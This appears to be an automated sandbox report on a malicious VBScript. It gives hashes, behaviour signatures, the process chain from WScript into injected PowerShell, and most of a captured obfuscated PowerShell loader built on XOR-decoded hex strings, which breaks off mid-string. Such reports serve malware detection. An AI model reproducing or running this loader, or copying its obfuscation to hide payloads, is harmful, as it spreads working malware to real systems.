03478e943747cf8baec9db5d77c280077e2250693a72fbae9d14e10ddd459947

General

Target

28288277-MSC038837.vbs
Size

399KB
MD5

4c2813e6b5b012c84caea68e91051115
SHA1

56e77ee23bd42f375b7558774b055173c5b78da2
SHA256

03478e943747cf8baec9db5d77c280077e2250693a72fbae9d14e10ddd459947
SHA512

22c0b09207cb6d0f93765ca63fbf238d8d924b01ea5be45322e12b6beddf7672d110abdb4b2cd26192b1b4b7df4dce5557b679a8a711802aa2e01e97f9bb0061
SSDEEP

6144:z698S8/DcGaT3qRXbdjohlI/ss5vzBbEpXUrnY3FXPfkhSkoOACCXL:z6CS8/1aT6hdUhlcVBbEpXUryJPfkUrX

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1816 powershell.exe
1796 powershell.exe
1872 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1816 powershell.exe
Token: SeDebugPrivilege 1796 powershell.exe
Token: SeDebugPrivilege 1872 powershell.exe

pid	process
1816	powershell.exe
1796	powershell.exe
1872	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1816	powershell.exe
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeDebugPrivilege	1872	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1192 wrote to memory of 1816	1192	WScript.exe	powershell.exe
PID 1192 wrote to memory of 1816	1192	WScript.exe	powershell.exe
PID 1192 wrote to memory of 1816	1192	WScript.exe	powershell.exe
PID 1816 wrote to memory of 1796	1816	powershell.exe	powershell.exe
PID 1816 wrote to memory of 1796	1816	powershell.exe	powershell.exe
PID 1816 wrote to memory of 1796	1816	powershell.exe	powershell.exe
PID 1816 wrote to memory of 1796	1816	powershell.exe	powershell.exe
PID 1796 wrote to memory of 1872	1796	powershell.exe	powershell.exe
PID 1796 wrote to memory of 1872	1796	powershell.exe	powershell.exe
PID 1796 wrote to memory of 1872	1796	powershell.exe	powershell.exe
PID 1796 wrote to memory of 1872	1796	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28288277-MSC038837.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Katakombens = """ElFReuBrnSlcbatCriUnoSunMi BeHPhTLuBSu Ek{Di Gh Mo Co RopOnaSarSiaPomAb(Hd[ZiSadtJurBaiDonMigIn]Vi`$DrHMaSSk)Po;Ta Ef ar Ch Pe`$StBPeyretBoeWhsBi Ge=Er SaNreeAcwSk-MaOPrbTrjReeincSptFe TabBrySatVaeFl[Co]Me Be(Li`$OkHLoSAv.CaLMieTinMogSotUfhHa De/Mo no2No)Sp;ak Hi No al BrFOvoStrOp(Go`$RiiTv=Ca0Ko;Tr he`$Seipe Gr-anlAmtRa Ta`$LuHHoSTe.UdLeseNanStgBatSuhun;Ef Co`$AciKo+re=Ve2Va)un{ek Om Bi Es Be Ka Ex Vg Bl`$TuBSiyRytheeDrsVi[Fo`$PaiRe/Se2Mi]Am Tr=Uf Sc[MicProNsnalvudeBarTetPu]Tr:Sn:ShTApoArBreyKatDieKn(Ad`$NoHReSUn.EkSLeuOvbAksTetkorMoiNinAdgTy(Ko`$ReiCo,Oa Co2St)Be,St Pl1Fj6Re)Fo;Tu Bi Ap`$FoBReyJotHoeStsRh[St`$tviEv/Af2ti]Be Su=Ha Gd(Le`$CaBNeyGatGeeEnsNe[Fl`$spiCl/Un2St]Ba Ha-HabSixSkoFarCa Sk1El2Tr3Ch)Ba;Wr Fo Di Ov Ma}Gy St[soSTutCirRoiTinTigOr]St[FoSFryrhsIgtSaeUdmDi.BmTLaeAuxDetKa.AkETrnFrcUnoCadiniDonPlgAd]Ac:Ve:tyASuSSoCStIIdISt.ChGRieSutUlSSetDurPoiBjnGugFo(Pl`$UnbCayAutVieAlsTr)En;Sk}Ld`$SvCVizUniBogseaDonEiyAa0La=osHSpTCeBBo Ve'Fo2Un8No0So2Bl0Os8Ro0DaFAn1DyEsu1fo6Op5Un5Bl1HyFRa1Um7St1se7Pe'Et;Ac`$StCSpzPiiKugSoaPinOpyTa1Op=PaHDiTJoBTa At'Va3Pe6Sc1fr2al1Fo8Ac0Ge9Bu1Io4Un0Ch8Sl1Tr4Gr1AdDTr0SkFGl5Fn5be2GeCpr1Fi2Sa1ob5Fd4Ok8Na4Ha9Si5Sl5Af2SeEHy1Sp5Se0Ec8Si1ApAUn1paDRe1KiESo3Ga5as1PrAPo0UnFHj1Ot2Fl0KaDPl1FaEFl3St6Is1DeEOp0AlFBa1to3Sl1Fj4Mo1SjFUn0Sa8Fd'mv;ma`$SoCBozFoiWagInaWhnSpySt2In=PaHCaTZoBMa In'Ac3BeCxa1LaEFl0RaFCe2ReBHo0Ri9En1Ma4Ga1Da8Em3FiAUn1SkFGa1suFRo0De9Gn1AfEUn0Fl8Li0Al8ns'An;Po`$TiCDezSliAdgToaOvnKlySi3dr=DrHVoTStBMa Ab'Ro2Ek8Re0Sv2As0Re8Nu0srFFa1MeEEu1De6Fe5ch5Bu2Bl9Sp0SaEUn1da5Fs0ReFAd1Tr2Un1Fo6Co1OfEPi5kl5Dr3No2Ma1Ko5Kr0CoFov1OpEFu0Sp9ki1Gu4pa0InBTo2Lo8Ta1KrESe0Fr9Ph0prDDu1No2Sv1Zo8Kl1CyEVa0Bl8fo5Un5Ef3al3Gr1brASt1Eu5Af1ImFNe1Di7st1luESm2ta9Sr1PrEpr1LgDDa'Ly;lo`$JuCSuzAdiTugViaBenPiyPr4Ov=RiHBlTFeBUn Te'An0Hy8Cu0SpFMe0La9De1Eu2Br1In5He1DrCBu'Ou;Cl`$LoCCozEmiCagBeaRenKyyVa5Hy=ViHVeTklBPh el'Ud3TuCOm1AfELa0meFUd3Fe6Ke1My4Ka1StFSi0unEFe1Pj7St1BlEKo3Im3Ba1CoADu1Po5Sy1ShFFa1Am7fo1InEAn'Fl;Fr`$OvCHizDmiSlgAnaAdnSuySk6Ha=RaHGrTVkBfr Bi'Ta2Ou9Ba2FiFma2Kr8Pa0GaBAf1FlEIc1Pi8Fi1Bi2sv1MeAIn1Pa7Vi3tj5So1SeATu1Po6Tb1DaEIt5Ca7Ba5SkBsc3Se3mo1Se2Ma1reFSk1JaEDo3Pr9ha0Rh2Ve2Fl8Ci1an2ba1FaCMy5La7Do5UnBFr2FaBTr0DeESo1In9Sy1Cl7In1Sk2By1Di8Fo'de;Ca`$EfCImzDoiUngspaBanReyCa7Ca=DiHKuTEnBca Ka'Br2Tr9Dr0MaESy1Ho5Dr0MeFFo1Ba2Sa1De6xa1LiEPa5Fl7Se5PrBLi3Sv6fo1PrATe1Co5Ru1FaADr1EfCIn1BeESp1BiFHe'Mo;In`$AlCWizKhiLegUdaSknMayAn8be=TrHInTchBLn Sy'co2No9Hu1FoEsc1KaDSp1Pa7Ar1MeESk1en8Ad0CoFDe1PeESb1InFTe3TuFSu1PaECh1In7Te1EpEfo1TwCVi1TiAPl0RiFNo1fiEAf'Sk;Am`$noCArzDoiSegTraInnSayNa9Ir=HiHRhTAuBCr Se'Ou3Be2Ov1No5Ef3Su6Un1TjEAn1Fr6To1Mu4Pe0As9Do0Mi2Fr3Sh6Lr1Sh4Si1ExFFr0TeEDe1Tr7Ge1FoENy'Se;fa`$AnUWorSaaHonSviarfVieUnrGeoSeuTrsTi0Ti=ChHSuTPoBFj Ra'Br3En6Ar0Vi2sy3GrFNe1DeEGl1Ha7Me1TrEAu1baCSu1MaAPe0NeFUo1SkEHo2MoFCo0Sp2Pr0BeBAq1CoEVa'Ve;Re`$ScUGrrYoaInnpliArfUneIsrLeoUnuStsHy1In=ReHAnTViBrh Bu'ga3tr8Ta1Se7St1ThADe0Ge8Ou0Ra8Aa5Re7Mr5OrBLi2vaBJo0GeEMa1Be9Re1En7Ed1Ba2mo1Op8ba5St7Sc5CrBEx2Co8pr1CiEUp1DeAVi1sa7Bu1skESi1NuFSu5Fl7Ha5DrBTa3taAAn1Ci5Ra0Au8st1Ro2Tr3Ha8Om1Ma7Ti1SuASt0Ud8Jo0So8Ub5In7Sc5PuBOb3moADe0YaEHo0CaFOv1In4Fa3Bo8Bl1la7Be1HeAKo0Is8Sk0Be8Ri'Fe;Hr`$BeUParBraVanneiSlfCaeSurSpoUnuFlsIn2Fo=GaHOzTNoBAu Fo'Dr3Af2Tr1Sd5Ha0SkDFi1Fl4an1Ou0Co1FrEbe'An;Bl`$PaUirrInaSlnVaiDifspeNarJdoQuuCusSo3Sp=OmHAxTSaBWa St'Ca2buBFo0TuEPe1Re9Ha1St7Pr1Vl2Jo1Su8Cr5un7Pi5PeBBe3Te3Sa1As2Po1SbFIn1GeEBr3Mi9Re0Tr2Bu2Gl8Re1Pe2Sm1PhCSh5Ph7Ma5DeBDr3fe5Ka1CuEGa0KvCEr2Pl8Un1Re7Ly1Al4Ja0SlFCu5Tr7Io5SeBAl2NaDBe1Si2Ga0Un9Ek0PuFRu0KoEud1doAIn1St7No'Hr;Em`$fiUOvrCoaEnnSviSafFaeSurAkoSauSosFr4Po=FlHJeTToBCa La'Ni2SuDPr1Fy2St0Mi9Ba0NoFDe0DaEcr1gaAIs1An7St3PaAUn1Fo7Ta1De7Ke1As4Tr1Re8Dr'El;Su`$InUFrrTeaprnPoiFofPueAdrBioMiufasSo5Pu=NaHCeTOuBGl Ui'de1Om5Pr0foFAf1orFNy1Mo7Co1So7Fl'Be;ud`$OpUSarouaConAciPafEmeSvrUnoCouGlsAf6An=PaHTrTDoBFu Ug'Ka3Po5Se0LrFed2ReBSr0Ov9Ge1Fa4Tr0FuFVa1FoELi1Co8Sh0VeFRd2AmDQu1Yd2Fo0Fu9Sv0ScFLe0koEte1CaAVo1Li7Sg3or6Ec1PrEFo1Wh6To1Ki4Ro0Un9Sl0to2Bo'Lo;Un`$SpUSorBraEknsciDafIneParUdoAtuCosTy7Ko=moHCoTMiBUn Af'De3fo2In3QuEst2Ud3Lo'De;ch`$SaUAmrOpaSanSpiUnfLieGerIroReuResIm8Ma=SeHFjTBaBLo Ji'Co2se7Re'Ko;KuSFreMitPl-KoAnolBliOnaNosTy He-FrnUnaAnmAgeLu NaUFirFiaTinSkiTafNeemerInoPruStsGe9Fo Ud-GrvfoamolSeuOpeBa Ta`$UlUStrSeaPrnGliOmfsyeParEmoDuuUdsGr7To;SofTrumenGrcsptFliDuoTanCa SkfAbkMopPa Di{BhPAsaCorSoaTtmAs na(Go`$LavNe_AdmVa,Rv Su`$vevNo_UnpFi)Au Pi Ok Un Fa Hj;Ga`$SedFarCysFraValgugMa0Hu En=GuHInTUnBOb La'Av5LaFSt0LuDPs0StEEk1Gn5In1Kl6St5wiBPo4id6ra5BiBNo5Tr3Ps2Tr0No3BiACh0AmBSp0PrBdi3FoFFa1Ti4Th1Me6Tr1suASh1He2De1br5Sp2Id6Ag4Ni1Fe4Cr1Pl3Pa8Di0SbEBa0Ps9Na0Me9Co1waETr1Ae5Pr0BlFKo3PoFKy1un4Pa1Sk6Un1arAAt1Ho2sy1Sa5St5He5Pu3DiCNo1GrEBo0MoFSo3MaAGr0Di8Ov0Su8To1FoETr1Pi6Ki1Re9En1Hi7Ro1Dv2Ti1KoETy0Ud8Id5Im3Wa5Ca2Au5NgBSt0Ad7Re5RuBEx2SkCMe1Pr3Co1SeEKl0Sn9Fe1FyEIn5Ha6Gl3Sk4De1Jo9Ud1Bo1In1BuEIm1Fr8Ko0LaFBa5PiBAc0Hi0Er5RuBSa5waFCo2Fl4Ec5Fl5Fi3baCTr1da7Sv1Za4Ci1sa9Fr1OvASi1Ca7Pl3PhARe0Td8Te0He8El1ReEWo1Il6Ta1De9Fa1Si7af0Cr2af3Ry8Es1LiAKe1Ha8Ps1Ir3Fl1StEAl5soBBa5Ta6Eu3MiAFl1Pa5Re1ImFOv5GrBSi5SpFKu2Te4Fr5Ra5Bi3Af7Un1Bo4No1No8Hj1MoAVe0suFBy1ta2Co1To4Ch1es5te5Sc5sk2Ra8Fl0DeBFa1Ta7St1De2En0FoFFo5rh3Ea5UmFCo2KyEKa0Pr9Ko1SaABe1Tr5Re1So2Sp1DuDLn1PeENo0Ma9Ba1Ex4Il0JuEEf0Af8Kv4Wa3Ku5by2Im2Le0ud5Im6ma4UlATi2Fr6Ka5Va5Af3StEDu0CaAFi0SkEOb1saAMu1Li7Di0Al8Pa5Co3Bi5BoFBa3Pr8Am0Sn1Op1An2Se1MaCaf1SlAVa1Lm5Vo0Ho2In4BaBMe5Ty2Af5PaBAk0pe6Sa5No2Ne5Fa5An3FoCha1ReEFu0AsFHm2RoFGr0Pa2Me0SnBFr1MiEne5Sm3Sv5NoFfe3Le8Sl0Uf1An1In2Pl1SeCGa1TrAFr1Aa5Be0Be2In4InAjo5ch2Ca'Ab;ViUFerFlaRenFeiBefvieUnrSkoPouMosBl9An Sk`$ImdNarSlsPlaFrlAngVe0Hi;wi`$LodVarTrsTraColsmgTr5Sp Ed=Te UnHDiTslBCl Mo'Tr5FeFpo0KnDFl1VaAHo0An9Ur2Tr4Sp1ReCIl0FlBMa1IlASt5SuBPy4No6Lo5TiBEd5DiFNo0XeDFo0stEBi1gr5La1Pr6Ce5Ko5ak3MeCRe1DiERa0TiFRa3An6Sa1PrEMo0VeFMe1Os3St1Go4St1ViFKo5Cu3Ac5PiFDo3Uf8Un0Ma1Vi1Pr2Ey1BlCDi1SkAUd1Ka5Ke0Si2pr4Ve9lo5Co7pa5WoBGu2Hj0Ny2CoFHu0Ap2Es0TaBGa1CuEUt2Pl0Wr2Gi6Ba2Re6fo5VaBGe3BeBTr5Ek3Cl5PrFPr3ja8Is0Tr1Co1He2To1PhCKo1KuASe1Ud5Sy0Li2Ps4Di8Re5Tu7Fe5PoBOr5OmFSp3No8Re0Tr1Mu1No2Qu1AaCSt1LyAUd1dg5Le0Ri2Or4NoFSp5No2Tr5Re2Ko'Pa;udUBrrUnaJnnPeiUnfUneWorEvoTeuPesIn9Ek Fe`$WidJorAusPoaMilbrgFo5Tr;la`$BedPirSksMaaNulSpgUn1Pr Ma=He TyHStTDeBCu Sy'In0ba9Ex1SyECy0PlFdi0PiETa0Ri9Be1Ad5ho5SlBPl5LaFTr0ReDCa1KnANe0Or9Da2ch4Mu1GrCFo0BjBUd1CoAak5No5Ix3Co2Sa1Ve5Po0HoDSl1Ar4Ma1Se0In1MaEIn5He3Ap5LuFSh1Ma5Me0VaERa1la7Be1Ju7Ac5Sl7Fo5OvBce3StBDe5Ov3Le2Sd0Cu2Hu8Ve0La2sy0St8Va0OpFLo1PrETr1Re6Br5Sk5Pl2El9Ud0TrEPa1Di5Ho0IsFAr1Gu2re1Bu6Vo1suECa5Lu5Eg3Gl2Fo1Vi5Mu0LiFPi1RaEFe0Hi9St1Ba4Ky0DiBMe2Kr8Bi1AlEDe0Et9an0EfDGo1Ma2Fi1Eu8Su1DeEbe0Ov8Mo5Ty5Sw3Cu3Fo1DaAMi1Pr5Ko1FoFOp1su7ho1ToEKa2Un9In1AdEBr1auDPo2Da6Lt5pa3tv3No5Tr1UnEre0CiCAl5Ar6Fo3Ex4me1Ec9sy1Pa1Pr1LaESl1Ov8St0ChFEx5SuBPa2Ku8Pl0St2Di0In8St0MoFSq1ArESp1Dj6Al5Ve5Om2Pu9Tr0PeEIn1in5tr0BaFmi1Sc2La1Ch6so1ReECo5Mo5Ne3St2Ca1Bi5Ga0WaFDa1ZiECh0Wi9Da1Un4Et0StBTs2Pu8St1SaECo0Se9En0KrDMa1Lo2Th1Di8No1arEDi0Af8Cy5Ri5Ba3Mo3Ka1chADe1Af5St1ClFfe1Fl7om1SaEPo2Sv9Am1AfEOs1MaDSt5Ke3La5Sp3Mi3Ta5Ex1skEVe0gaCFa5kd6Ga3bl4Dr1St9Mi1Ca1Me1StEGe1Ca8so0SnFgl5BrBSw3Ha2Go1In5To0KaFKo2PaBRe0GrFJu0Ka9Ov5Ba2Sk5Em7Lr5MiBDe5De3Ca5miFSa0KeDKa0FeESl1Ti5La1Li6Ar5Sa5Va3LiCEj1RiEru0FrFIn3Wa6Ce1TiEMa0GeFSu1Ce3Sl1Gr4un1SyFMi5Ov3Sc5SiFFo3af8Vi0Di1To1gu2Al1RiCSo1HjARr1Ra5Fn0In2tr4ThEVe5de2Sp5Su2Su5Br5Hy3Ol2Af1Un5In0frDGe1Po4Ca1Fe0Su1KoESk5Dy3Ov5WiFSo1Dd5Ph0BoEFr1Re7An1Ov7Se5Ha7An5auBLf3VrBSi5Ko3Tu5heFWe0MeDLr2Ma4Ko1pr6he5Wi2du5To2In5Pa2Ep5Do2Pr5Pa7In5SeBRe5EmFGe0UmDPa2Su4Ca0EkBvi5Pl2vi5St2od'Af;PlUInrudaUfnFoiTrfLoeclrBeoMauHasAq9Du Un`$QudberBrsTraInlFrgCe1Li;Ne}PhfJuuFdnPrcWotEsiRaoDindr TeGSuDBeTSn Ot{SpPSyaFarChaBomCa Kr(Ru[LsPDaaElrShaEkmKleLitpueNorSt(HnPChoKusariFotshiSkoOunIn Hv=Du Gr0Sc,fr BeMLaaTenTudReacitSooBerukyGa Ri=Op Ve`$ReTNorPruImePa)Sk]Be Un[AnTEnyAfpAreAe[Mo]un]La Ko`$PavViaPtrSk_DepFeaUnrKoaBomspeHatUkeurrSusHy,An[MePMiaOnrBaaFlmMeeMotKoeAsrTo(OvPAvoorsSpiqutitiPdoKvnDe Ma=St Un1Un)Ud]Se Sk[MaTFayBepSkeDi]ax Ed`$NovSerJetOv Do=De At[PrVReoIniTodDa]Sk)Re;Va`$irdForBysSpaLolStgFu2Av Ca=Ge FiHVrTSoBRe Ud'sk5KiFAl2FrDHn2SpFPh3Ge9Th5JoBDr4Be6Un5msBpr2Am0De3CaAar0asBFu0ReBGi3SpFIn1No4Be1Tr6La1AdABe1Sk2Fi1Fr5Gu2Ca6Un4Al1En4Tu1Fo3Lo8Pr0afEKa0De9Co0dy9Su1RaEBl1Fi5Di0DaFSo3AuFko1Di4bl1Cl6Lb1LiADi1bj2Ov1Tr5Re5sy5Ax3KuFDy1SpEDe1UnDAn1Da2St1Af5Ge1TiEEp3MiFPs0so2Po1Im5Pa1GrAGa1Em6re1Po2Ty1Pa8Je3ReAPo0Te8St0Pr8ca1SpEUd1Ex6Br1De9No1De7Qu0Re2Ov5Na3Ty5Ny3Fa3Ri5Je1shEFl0AmCGa5Gy6Hs3Ga4Co1ba9Sp1Ne1Cr1LoEAg1Te8An0ReFKo5LaBVe2Mu8Sa0Pr2Cy0He8St0ToFKl1FaEFe1Vi6Be5St5Cu2rn9Op1BoEBl1SkDco1Ro7Uv1KeEDe1Fy8Un0DiFDe1Tr2su1be4Li1Bl5Fo5Re5Ek3GaAKe0ph8La0Ca8Fr1MiEIs1Ne6Le1Ne9Sm1Re7Le0Ba2Tr3Pa5Ad1PsARo1Cu6St1SkEDi5Mn3Sk5SvFTr3Pl8Ga0Fo1Ka1Si2Ge1LaCDe1PlAAv1Re5Pr0Es2Af4Co3Pa5Pl2ha5So2Ke5Li7Ll5EkBSl2Re0Ta2Be8Hi0in2Hu0Oi8Lu0PlFSe1VsERi1Je6Be5Un5re2ak9Ko1LiECh1KlDEx1de7Rv1CrEVe1Ci8Si0FiFsu1Fa2Rh1Be4Ti1Ov5Ou5Sn5Sa3coEKu1Fe6gy1Tw2Pr0PrFFa5In5Al3DeAGr0Re8Ko0Mo8Re1haESa1Sa6As1Mi9Ch1Sn7Op0No2pt3Uk9Me0CuEPl1Co2Un1Ac7Un1SlFKr1AnEWh0Pu9In3SiAFl1La8Dr1Ti8Tr1UnEFl0Do8Sp0Fr8St2Pl6Kn4Kr1On4Ex1Ps2Ha9Dr0SeEFo1Ki5Re5Fa2an5No5Ko3BiFSa1PaEPe1LeDMo1Sw2Br1Ho5Re1MiEPr3MoFBo0Si2Fo1Au5Sp1FrAGa1Vi6Pa1An2An1Vi8Gi3Sk6Ba1Tr4st1PlFAd0BeEVa1Ra7Am1AfELs5Tr3Ba5UnFPh3Gr8Hj0Ne1Ce1El2Un1KiCSp1GrANo1pi5Pi0Ke2Be4Vi2Vi5Su7Gl5ToBDo5GaFpr1kaDIl1SmAan1Br7Ko0Ek8Sa1luEKi5Ve2Re5Di5Ci3ApFin1OpEAn1IdDKl1Be2Ka1So5Op1EnEBr2HoFAf0Ba2Mi0KvBPr1FrESt5Gr3Pr5UnFUd2paEUn0sk9Ov1iaAev1pa5Bo1Gh2Di1ChDBy1HyENo0Ba9Re1Pr4La0ChETi0Fi8Au4SlBTr5St7Ba5DaBEp5EkFun2ReEOr0Ya9Di1GuASa1Sm5Mu1Ex2Ud1AcDHa1TaEAs0Ka9Ka1Le4Gu0UdEPl0Di8Br4DeADr5ta7fa5SnBOp2At0Fo2Tj8Fo0Di2Mo0Tr8Tr0UnFBa1AeEam1Va6Af5Ov5Sy3At6In0raEMa1ov7Ha0HaFSk1Ne2Sp1tr8Re1AdAAr0Or8Ta0PrFwi3BrFEs1TrEYa1Co7Fr1SqEDr1SiCFa1OaAAf0SlFKn1beEFa2Tb6Ti5Kr2Fu'He;UdUForGlaTenBliScfSpeBurBloHauansGi9Ou Pr`$SkdDmrIdsSpaShlDugAb2En;Fs`$StdHarNasGlaKelTagMi3Fo sp=Dg ReHOpTDoBUl Af'Ne5ImFTe2UnDun2ChFFi3Wr9Ti5Ko5Fy3SuFDy1LeEHa1koDDi1Fa2Pr1Ak5ho1SaETu3Kn8Te1Bl4Ti1In5Fl0Si8Ja0NaFAs0Ch9Ab0KuEFl1Ud8Pr0UnFRe1Ta4Et0Op9Ko5Gu3Ro5PeFMo3Ud8ob0Py1Ve1si2Ka1EfCFa1NoAma1Ga5Dr0Pr2Ek4SpDVe5Pr7Da5LiBFe2Da0Ac2De8Mi0Un2So0Sk8Br0RaFSa1ReETe1Op6Si5Si5Sa2Di9En1MeETj1NoDBe1Ka7Pa1CaERa1Qu8Lu0FiFRa1Si2Bi1By4ma1Fo5Gh5Pa5Um3Ad8Br1CuAPa1Ma7Un1Le7gu1Re2Un1Ce5Ke1RoCBa3Se8Fr1Py4Sn1Co5Po0ArDUd1VrEHa1Sk5St0InFPa1An2St1In4Pa1Eq5Sn0Su8no2kr6al4Po1St4An1So2Ca8pe0RoFRo1ReAko1El5Ud1reFOs1EmAUn0gu9Sp1UfFFa5Fr7Re5leBMe5VaFGo0TrDSc1OpAUn0Su9Br2Ko4Sp0TeBfu1ArABl0Di9Fl1AnAAu1Se6La1InEMo0unFMe1krEEp0ud9Gl0Un8Ba5De2Fl5Mi5Ju2Sc8Ps1SaETr0DiFIv3Vi2Le1ag6mu0LyBAd1Su7Ti1SuECa1Ko6As1JoEKa1Wh5Re0SiFme1ChABa0CoFTe1St2He1Be4Am1No5Se3InDBi1Ph7Pr1ByAGr1ReCmi0Tr8Pu5Ch3Sk5BoFMa3Pe8Fo0St1Me1Di2En1tuCto1MaACi1So5Te0ud2Pr4LaCHo5Ek2La'Pe;UnUMirSiaBinStiakfRueCorNioPhuDasTr9Bo Di`$FodForbasAbaJulSagSa3Di;Sp`$ledSirCosQuaPalHjgDe4Si Do=Lo DyHskTElBGe Sm'Op5MoFTh2KnDAd2AsFKe3Lu9Cu5Ka5Me3OvFMa1VeEGl1CoDea1Ra2fe1Ba5af1AcEHa3Xi6Mi1FrEud0SkFre1so3pl1Ma4Sn1vaFOp5An3Re5DiFRa2GeESt0Ep9Sn1MoAUn1Vo5ef1Ov2Un1inDBi1TrETe0Aq9Bu1De4ho0BaEKa0Pl8Be4Fo9Mi5Ma7Un5CoBDa5NoFVe2HeEPy0lo9Sa1SaAHe1Mu5Pl1Af2yo1PaDMi1CoEDe0Ar9Ko1Be4in0ReEIn0be8Sm4Ma8pr5An7Sa5OpBSi5SjFMi0FaDPe0Am9Hu0NoFOu5To7Co5StBLi5BrFAf0BrDSa1SaASt0Ca9Up2Ch4Ud0KiBDe1MaALi0Fj9Fr1VaAPi1Tr6Kr1CeESl0ArFMi1puEMe0Co9Id0De8Sh5Sk2Di5Ap5Mi2Fu8Or1CaECo0AnFCa3Af2Pu1Co6Co0KeBKo1Di7Pe1GeEHo1Fo6Lu1SlEBe1Ek5Ha0MaFUn1StASk0FiFTr1Ov2Re1Da4Re1Ju5My3ScDNa1Vi7Si1SyABi1StCLi0ho8al5st3St5StFBe3Ti8Li0Do1Da1St2Ir1SvCKe1TvASt1Sw5Ba0Fo2Py4UnCOp5Du2Su'Ya;fuUVirDsaStnSmiThfmoeforTaoBiuSesSh9Fo Ri`$GrdSurvesSaaPalofgIn4Sh;Su`$RedBurBrsAraRelTegBo5Ge So=Se JaHCoTNoBKu Ma'Fr0Ga9No1InEDl0NiFti0SuEMo0Go9Af1Re5Un5UnBSl5EmFHa2StDSv2DoFSm3Sc9no5St5Ek3Fi8To0Ga9Fa1ClEDi1OpAPo0StFDe1InEOb2SeFEn0Fa2wh0YeBre1PiESl5Pr3Ma5Hy2Ba'Gr;LeUPorNoaGanSkiDifRoesarKooRduEtsFa9Re Fo`$AmdMirMesspaAtlVagSu5Sp ko Sa Fl;Pr}Co`$AmkInkSl Th=An InHKiTChBli Bu'Di1Dr0Br1AnEBe0Ep9Na1ka5Fo1EnERe1Re7Bl4do8Fr4La9Ar'bu;By`$RedLirInsTiaEnlBogSa6La Pl=vi NoHDiTPnBBy Vo'As5HaFRa0GaDCo1SpAFo0il9St2Br4Un0maDSt1EnAPa5StBIn4po6Ad5FuBCa2Bi0Fo2Sp8Fr0Re2Me0Fe8Sa0TuFDi1VaEsk1Ak6Re5Un5Im2Ra9Sk0GiEDe1Ro5Gr0HeFIn1Ha2Ce1Im6Fl1ydESt5Ha5Fr3Re2Qu1Sp5Un0MaFPl1BrEVe0Vg9De1Pu4Co0GeBBa2Fa8To1EkEbu0Sk9Mi0PsDSk1in2bj1Hd8fo1BaERe0Be8ni5Sc5Im3St6Kv1PaAMi0ps9Ue0Sv8Ra1Ka3Bl1MeAef1Su7Id2no6Zo4Cl1Co4Co1No3AnCPt1RaEAf0GiFCu3reFHe1PrERa1Af7Pr1DeEKa1LeCKo1SkAKi0heFKu1DoELi3KoDKl1ne4Du0Or9Fo3StDDi0ScEBi1At5Ha1Pe8Pi0GiFUn1Li2No1Ma4Ov1Fi5Me2KnBab1En4Ba1Un2Le1He5sp0DeFHa1VaEPl0Rd9Ca5Co3Bi5Re3Sy1CoDNo1Kv0Te0HeBHa5MaBEu5BaFLo1Ou0St1Fa0Sa5kaBFi5boFPi2GrEFo0Un9De1DiACh1Sy5In1Wh2ve1GeDPi1enEDi0Ga9Tr1Co4La0BiECu0Ph8Bl4ReFOp5An2Ub5Mu7Sa5siBPs5Sk3Ma3EdCTh3UiFRe2UdFmi5LoBSo3VaBMa5In3Sp2Co0Sn3Sv2jn1Pr5De0SlFSh2LiBKa0DeFPa0Na9Ba2Kr6Pr5Me7Im5FoBBu2At0Pe2FoEou3In2ho1By5Pe0SlFFa4Sk8or4Ha9Tr2sa6Pr5Vi7Ar5AmBUp2At0Ha2DeEGa3Fi2Hu1Va5Ud0KaFwi4Ho8Tj4Fo9Pe2Te6Ge5Ce7Fl5phBSs2Fr0Cr2FiEup3Su2Al1Fr5Tr0OvFSv4so8Ej4Fr9Un2Fr6Ba5Ba2In5SoBMo5Ns3De2Af0Ma3Sl2St1Ku5Al0CoFGa2OvBUk0InFBo0Pr9Ra2Ni6Mi5Ed2Bu5Gi2Pe5En2Bo'Es;NoUEarDeaUnnDeiPrfCoeInrUnoKnuLesLg9Su Pe`$sadInrPisraaMilsigDi6Te;in`$OcvAraSursu_HenBrtUt Di=Ka NafFoktjpPr Sk`$OmUAvrBaaKanPoiBlfFdeSprCooMiuEnsru5Ks Be`$ApUWorFuaCanMeibafSaeElrPuoPyuHosNo6Pr;Mo`$FodstrSpsScaPalRogOp7Op ki=St SeHSmTTiBUn Ed'De5FiFLo3Se3si0Pr2Lu0El9Gl1PiASt1an8Un1Un2Op1BeDPe1Ap4Pr0ne9Sk1Sy6Te4Di8Po5FlBre4vo6Pa5DiBRe5frFMa0OvDFa1UnAin0No9Kn2Mi4Ma0PrDsy1WoATo5Ge5Rs3Wa2Hy1Tr5Jo0MaDSh1Su4Is1Re0Em1HyETr5Fr3Me2In0An3Eg2Ra1Pi5Oz0QuFRu2OvBUd0FlFDr0Et9Pr2Wa6Tw4Ky1Il4me1tr2Ca1Pa1ClERe0Ko9Ad1Do4We5Pr7re5baBRi4he8Se4BrECa4La3Te5Ka7Tr5SpBAm4TrBPa0Ca3Fr4zo8Gl4AbBti4PrBFr4seBHe5Sq7Me5SlBVa4UnBDa0Ko3fi4enFDa4FaBRa5To2Ur'Al;KoUKirFeaRenIniPefFreAbrSvoPluPosSa9Eq Ca`$PadRerMisFraDilxpgEx7Fr;Il`$LydHarSesBoaLulsngTa8Ts Gr=Om PlHSkTInBPo 